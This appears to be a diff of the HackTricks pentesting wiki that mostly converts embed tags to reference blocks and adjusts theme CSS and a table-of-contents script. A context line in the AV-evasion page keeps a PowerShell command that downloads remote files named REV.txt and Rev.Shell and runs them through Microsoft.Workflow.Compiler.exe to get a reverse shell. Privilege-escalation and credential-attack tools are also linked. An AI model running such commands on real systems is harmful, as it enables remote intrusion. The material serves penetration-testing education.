 {{#include ../banners/hacktricks-training.md}}
-
-
-

src/windows-hardening/active-directory-methodology/README.md

@@ -684,7 +684,9 @@ rdp-sessions-abuse.md
 
 ## AD -> Azure & Azure -> AD
 
-{% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/azure-ad-connect-hybrid-identity" %}
+{{#ref}}
+https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/azure-ad-connect-hybrid-identity
+{{#endref}}
 
 ## Some General Defenses
 
@@ -721,6 +723,3 @@ rdp-sessions-abuse.md
 - [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/child-domain-da-to-ea-in-parent-domain](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/child-domain-da-to-ea-in-parent-domain)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-

src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md

@@ -55,7 +55,9 @@ If an attacker has already compromised a computer with [Unconstrained Delegation
 
 ## RCP Force authentication
 
-{% embed url="https://github.com/p0dalirius/Coercer" %}
+{{#ref}}
+https://github.com/p0dalirius/Coercer
+{{#endref}}
 
 ## PrivExchange
 
@@ -128,6 +130,3 @@ If you can capture [NTLMv1 challenges read here how to crack them](../ntlm/#ntlm
 &#xNAN;_Remember that in order to crack NTLMv1 you need to set Responder challenge to "1122334455667788"_
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-

src/windows-hardening/authentication-credentials-uac-and-efs.md

@@ -140,7 +140,9 @@ This way requires the **victim user** to be **running** a **process** inside the
 
 #### Knowing the users password
 
-{% embed url="https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files" %}
+{{#ref}}
+https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files
+{{#endref}}
 
 ## Group Managed Service Accounts (gMSA)
 
@@ -264,8 +266,4 @@ The SSPI will be in charge of finding the adequate protocol for two machines tha
 windows-security-controls/uac-user-account-control.md
 {{#endref}}
 
-
 {{#include ../banners/hacktricks-training.md}}
-
-
-

src/windows-hardening/authentication-credentials-uac-and-efs/README.md

@@ -140,7 +140,9 @@ This way requires the **victim user** to be **running** a **process** inside the
 
 #### Knowing the users password
 
-{% embed url="https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files" %}
+{{#ref}}
+https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files
+{{#endref}}
 
 ## Group Managed Service Accounts (gMSA)
 
@@ -265,6 +267,3 @@ uac-user-account-control.md
 {{#endref}}
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-

src/windows-hardening/av-bypass.md

@@ -2,7 +2,6 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-
 **This page was written by** [**@m2rc_p**](https://twitter.com/m2rc_p)**!**
 
 ## **AV Evasion Methodology**
@@ -313,11 +312,15 @@ Every environment you go against will have their own strengths and weaknesses.
 
 I highly encourage you go watch this talk from [@ATTL4S](https://twitter.com/DaniLJ94), to get a foothold into more Advanced Evasion techniques.
 
-{% embed url="https://vimeo.com/502507556?embedded=true&owner=32913914&source=vimeo_logo" %}
+{{#ref}}
+https://vimeo.com/502507556?embedded=true&owner=32913914&source=vimeo_logo
+{{#endref}}
 
 his is also another great talk from [@mariuszbit](https://twitter.com/mariuszbit) about Evasion in Depth.
 
-{% embed url="https://www.youtube.com/watch?v=IbA7Ung39o4" %}
+{{#ref}}
+https://www.youtube.com/watch?v=IbA7Ung39o4
+{{#endref}}
 
 ## **Old Techniques**
 
@@ -512,7 +515,9 @@ powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.g
 powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
 ```
 
-{% embed url="https://gist.github.com/BankSecurity/469ac5f9944ed1b8c39129dc0037bb8f" %}
+{{#ref}}
+https://gist.github.com/BankSecurity/469ac5f9944ed1b8c39129dc0037bb8f
+{{#endref}}
 
 C# obfuscators list: [https://github.com/NotPrab/.NET-Obfuscator](https://github.com/NotPrab/.NET-Obfuscator)
 
@@ -566,8 +571,4 @@ https://github.com/praetorian-code/vulcan
 
 - [https://github.com/persianhydra/Xeexe-TopAntivirusEvasion](https://github.com/persianhydra/Xeexe-TopAntivirusEvasion)
 
-
 {{#include ../banners/hacktricks-training.md}}
-
-
-

src/windows-hardening/windows-local-privilege-escalation/README.md

@@ -1544,7 +1544,9 @@ If you manages to **hijack a dll** being **loaded** by a **process** running as
 
 ### **From Administrator or Network Service to System**
 
-{% embed url="https://github.com/sailay1996/RpcSsImpersonator" %}
+{{#ref}}
+https://github.com/sailay1996/RpcSsImpersonator
+{{#endref}}
 
 ### From LOCAL SERVICE or NETWORK SERVICE to full privs
 
@@ -1618,6 +1620,3 @@ C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#antivirus--detections](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#antivirus--detections)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-

src/windows-hardening/windows-local-privilege-escalation/juicypotato.md

@@ -2,8 +2,7 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-> [!WARNING]
-> **JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. _**Check:**_
+> [!WARNING] > **JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. _**Check:**_
 
 {{#ref}}
 roguepotato-and-printspoofer.md
@@ -114,7 +113,9 @@ c:\Users\Public>
 
 Oftentimes, the default CLSID that JuicyPotato uses **doesn't work** and the exploit fails. Usually, it takes multiple attempts to find a **working CLSID**. To get a list of CLSIDs to try for a specific operating system, you should visit this page:
 
-{% embed url="https://ohpe.it/juicy-potato/CLSID/" %}
+{{#ref}}
+https://ohpe.it/juicy-potato/CLSID/
+{{#endref}}
 
 ### **Checking CLSIDs**
 
@@ -131,6 +132,3 @@ Then download [test_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/master
 - [https://github.com/ohpe/juicy-potato/blob/master/README.md](https://github.com/ohpe/juicy-potato/blob/master/README.md)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-

theme/css/chrome.css

@@ -852,7 +852,7 @@ html:not(.sidebar-resizing) .sidebar {
     border-top: 1px solid var(--table-border-color);
     margin-top: 1rem;
     align-content: center;
-    z-index: 101;
+    z-index: 106;
 }
 .footer .theme-wrapper {
     max-width: var(--container-max-width);

theme/css/variables.css

@@ -343,8 +343,8 @@
     --warning-border: #ff8e00;
 
     --table-border-color: #2f2f2f;
-    --table-header-bg: hsl(226, 23%, 31%);
-    --table-alternate-bg: hsl(226, 23%, 14%);
+    --table-header-bg: #2f2f2f;
+    --table-alternate-bg: #222222;
 
     --searchbar-border-color: #2f2f2f;
     --searchbar-bg: hsl(0, 0%, 11%);
@@ -429,7 +429,7 @@
     --warning-border: #ff8e00;
 
     --table-border-color: hsl(0, 0%, 95%);
-    --table-header-bg: hsl(0, 0%, 80%);
+    --table-header-bg: hsl(0, 0%, 95%);
     --table-alternate-bg: hsl(0, 0%, 97%);
 
     --searchbar-border-color: #aaa;

theme/pagetoc.css

@@ -72,7 +72,7 @@
     .sidetoc-wrapper {
         position: fixed;
         width: 250px;
-        height: calc(100vh - var(--menu-bar-height)  - 25px * 2);
+        height: calc(100vh - var(--menu-bar-height)  - 50px * 2);
         overflow: auto;
         display: flex;
         flex-direction: column;

theme/pagetoc.js

@@ -1,68 +1,76 @@
-let scrollTimeout;
+let scrollTimeout
 
 const listenActive = () => {
-  const elems = document.querySelector(".pagetoc").children;
-  [...elems].forEach(el => {
+  const elems = document.querySelector(".pagetoc").children
+  ;[...elems].forEach((el) => {
     el.addEventListener("click", (event) => {
-      clearTimeout(scrollTimeout);
-      [...elems].forEach(el => el.classList.remove("active"));
-      el.classList.add("active");
+      clearTimeout(scrollTimeout)
+      ;[...elems].forEach((el) => el.classList.remove("active"))
+      el.classList.add("active")
       // Prevent scroll updates for a short period
       scrollTimeout = setTimeout(() => {
-        scrollTimeout = null;
-      }, 100); // Adjust timing as needed
-    });
-  });
-};
+        scrollTimeout = null
+      }, 100) // Adjust timing as needed
+    })
+  })
+}
 
-const getPagetoc = () => document.querySelector(".pagetoc") || autoCreatePagetoc();
+const getPagetoc = () =>
+  document.querySelector(".pagetoc") || autoCreatePagetoc()
 
 const autoCreatePagetoc = () => {
-  const main = document.querySelector("#content > main");
+  const main = document.querySelector("#content > main")
   const content = Object.assign(document.createElement("div"), {
-    className: "content-wrap"
-  });
-  content.append(...main.childNodes);
-  main.prepend(content);
-  main.insertAdjacentHTML("afterbegin", '<div class="sidetoc"><nav class="pagetoc"></nav></div>');
-  return document.querySelector(".pagetoc");
-};
+    className: "content-wrap",
+  })
+  content.append(...main.childNodes)
+  main.prepend(content)
+  main.insertAdjacentHTML(
+    "afterbegin",
+    '<div class="sidetoc"><nav class="pagetoc"></nav></div>'
+  )
+  return document.querySelector(".pagetoc")
+}
 const updateFunction = () => {
-  if (scrollTimeout) return; // Skip updates if within the cooldown period from a click
-  const headers = [...document.getElementsByClassName("header")];
-  const scrolledY = window.scrollY;
-  let lastHeader = null;
+  if (scrollTimeout) return // Skip updates if within the cooldown period from a click
+  const headers = [...document.getElementsByClassName("header")]
+  const scrolledY = window.scrollY
+  let lastHeader = null
 
   // Find the last header that is above the current scroll position
   for (let i = headers.length - 1; i >= 0; i--) {
     if (scrolledY >= headers[i].offsetTop) {
-      lastHeader = headers[i];
-      break;
+      lastHeader = headers[i]
+      break
     }
   }
 
-  const pagetocLinks = [...document.querySelector(".pagetoc").children];
-  pagetocLinks.forEach(link => link.classList.remove("active"));
+  const pagetocLinks = [...document.querySelector(".pagetoc").children]
+  pagetocLinks.forEach((link) => link.classList.remove("active"))
 
   if (lastHeader) {
-    const activeLink = pagetocLinks.find(link => lastHeader.href === link.href);
-    if (activeLink) activeLink.classList.add("active");
+    const activeLink = pagetocLinks.find(
+      (link) => lastHeader.href === link.href
+    )
+    if (activeLink) activeLink.classList.add("active")
   }
-};
+}
 
-window.addEventListener('load', () => {
-  const pagetoc = getPagetoc();
-  const headers = [...document.getElementsByClassName("header")];
-  headers.forEach(header => {
+window.addEventListener("load", () => {
+  const pagetoc = getPagetoc()
+  const headers = [...document.getElementsByClassName("header")]
+  headers.forEach((header) => {
     const link = Object.assign(document.createElement("a"), {
       textContent: header.text,
       href: header.href,
-      className: `pagetoc-${header.parentElement.tagName}`
-    });
-    pagetoc.appendChild(link);
-  });
-  updateFunction();
-  listenActive();
-  window.addEventListener("scroll", updateFunction);
-});
-
+      className: `pagetoc-${header.parentElement.tagName}`,
+    })
+    if (header.parentElement.querySelectorAll("a").length === 2) {
+      link.textContent = header.parentElement.querySelectorAll("a")[1].text
+    }
+    pagetoc.appendChild(link)
+  })
+  updateFunction()
+  listenActive()
+  window.addEventListener("scroll", updateFunction)
+})